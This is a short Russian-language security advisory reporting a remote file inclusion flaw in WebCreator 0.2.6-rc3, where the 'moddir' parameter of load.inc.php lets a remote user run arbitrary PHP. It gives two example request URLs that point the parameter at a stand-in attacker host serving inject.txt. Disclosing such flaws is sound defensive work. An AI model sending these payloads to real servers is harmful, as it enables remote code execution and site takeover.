Программа: WebCreator 0.2.6-rc3

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
Уязвимость существует из-за недостаточной обработки входных данных в параметре «moddir» сценарием load.inc.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. 

Пример:

http://localhost/mods/config/load.inc.php?moddir=http://atacker.com/inject.txt?
http://localhost/mods/http/load.inc.php?moddir=http://atacker.com/inject.txt?



Оставить мнение